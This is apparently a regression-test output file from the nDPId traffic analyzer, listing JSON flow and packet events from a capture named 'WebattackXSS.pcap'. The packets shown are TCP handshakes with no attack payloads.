-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1499347075597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347075597,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0GplJM47OCl5SqAScSAxJwAAAgQFtAQCCAoD4yLEATlRTgEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1499347075597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347075597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KAhAAD4GndCsEAABwKgKMtBqAFA4KXlKZSTOPIAQAOXQLgAAAQEICgE5UU4D4yLE"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347078168,"flow_last_seen":1499347078168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347078168,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1499347078168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347078168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VtlAAD4GbvesEAABwKgKMtCEAFCbYgUIAAAAAKACchCYugAAAgQFtAQCCAoBOVPRAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1499347078168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347078168,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0IRJPKyYm2IFCaAScSB6mgAAAgQFtAQCCAoD4yVHATlT0QEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":949,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1499347078169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347078169,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VtpAAD4Gbv6sEAABwKgKMtCEAFCbYgUJSTysmYAQAOUZogAAAQEICgE5U9ED4yVH"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347079449,"flow_last_seen":1499347079449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347079449,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1499347079449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347079449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81tZAAD4G7vmsEAABwKgKMtCSAFDwQYPHAAAAAKACchDDzQAAAgQFtAQCCAoBOVURAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1499347079449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347079449,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0JKY6hHr8EGDyKAScSDvawAAAgQFtAQCCAoD4yaIATlVEQEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1499347079450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347079450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01tdAAD4G7wCsEAABwKgKMtCSAFDwQYPImOoR7IAQAOWOcwAAAQEICgE5VRED4yaI"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":971,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347080793,"flow_last_seen":1499347080793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347080793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1499347080793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347080793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x4ZAAD4G\/kmsEAABwKgKMtCgAFDV9pHnAAAAAKACchDOmgAAAgQFtAQCCAoBOVZhAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1499347080793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347080793,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0KAcF4FK1faR6KAScSAGXQAAAgQFtAQCCAoD4yfYATlWYQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1499347080794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347080794,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x4dAAD4G\/lCsEAABwKgKMtCgAFDV9pHoHBeBS4AQAOWlZAAAAQEICgE5VmED4yfY"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347082084,"flow_last_seen":1499347082084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347082084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1499347082084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347082084,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rj9AAD4GF5GsEAABwKgKMtCuAFC6z\/mcAAAAAKACchCAvAAAAgQFtAQCCAoBOVejAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":981,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1499347082084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347082084,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0K6mztSPus\/5naAScSDZPwAAAgQFtAQCCAoD4ykaATlXowEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1499347082085,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347082085,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rkBAAD4GF5isEAABwKgKMtCuAFC6z\/mdps7UkIAQAOV4RgAAAQEICgE5V6QD4yka"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347083358,"flow_last_seen":1499347083358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347083358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1499347083358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347083358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81M5AAD4G8QGsEAABwKgKMtC8AFCsV4wsAAAAAKACchD7VwAAAgQFtAQCCAoBOVjiAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1499347083358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347083358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0LzW0\/50rFeMLaAScSD4sQAAAgQFtAQCCAoD4ypZATlY4gEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1499347083359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347083359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01M9AAD4G8QisEAABwKgKMtC8AFCsV4wt1tP+dYAQAOWXuQAAAQEICgE5WOID4ypZ"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347084644,"flow_last_seen":1499347084644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347084644,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1499347084644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347084644,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8o6RAAD4GIiysEAABwKgKMtDKAFAgx\/mHAAAAAKACchAYPgAAAgQFtAQCCAoBOVojAAAAAAEDAwc="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1499347084644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347084644,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Mrcl6UQIMf5iKAScSBn9wAAAgQFtAQCCAoD4yuaATlaIwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1499347084645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347084645,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0o6VAAD4GIjOsEAABwKgKMtDKAFAgx\/mI3JelEYAQAOUG\/gAAAQEICgE5WiQD4yua"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347087256,"flow_last_seen":1499347087256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347087256,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1499347087256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347087256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8beFAAD4GV++sEAABwKgKMtDkAFAnsDFRAAAAAKACchDW5AAAAgQFtAQCCAoBOVywAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1499347087256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347087256,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0OTlcRoYJ7AxUqAScSCmLwAAAgQFtAQCCAoD4y4nATlcsAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1499347087257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347087257,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0beJAAD4GV\/asEAABwKgKMtDkAFAnsDFS5XEaGYAQAOVFNgAAAQEICgE5XLED4y4n"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347088552,"flow_last_seen":1499347088552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1499347088552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA892FAAD4Gzm6sEAABwKgKMtDyAFAECKqUAAAAAKACchB\/9gAAAgQFtAQCCAoBOV31AAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1499347088552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0PJdbGlkBAiqlaAScSCGtgAAAgQFtAQCCAoD4y9rATld9QEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1499347088553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347088553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA092JAAD4GznWsEAABwKgKMtDyAFAECKqVXWxpZYAQAOUlvgAAAQEICgE5XfUD4y9r"} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1499346956870,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7926,"flow_tot_l4_payload_len":16625,"flow_avg_l4_payload_len":503,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1056,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347091102,"flow_last_seen":1499347091102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347091102,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1499347091102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347091102,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uhVAAD4GC7usEAABwKgKMtEMAFDkONpnAAAAAKACchBtWwAAAgQFtAQCCAoBOWByAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1499347091102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347091102,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0QySpl9e5DjaaKAScSBGaQAAAgQFtAQCCAoD4zHpATlgcgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1499347091103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347091103,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uhZAAD4GC8KsEAABwKgKMtEMAFDkONpokqZfX4AQAOXlcAAAAQEICgE5YHID4zHp"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1065,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347092374,"flow_last_seen":1499347092374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347092374,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1065,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1499347092374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347092374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rL1AAD4GGROsEAABwKgKMtEaAFBpN80NAAAAAKACchD0agAAAgQFtAQCCAoBOWGwAAAAAAEDAwc="} 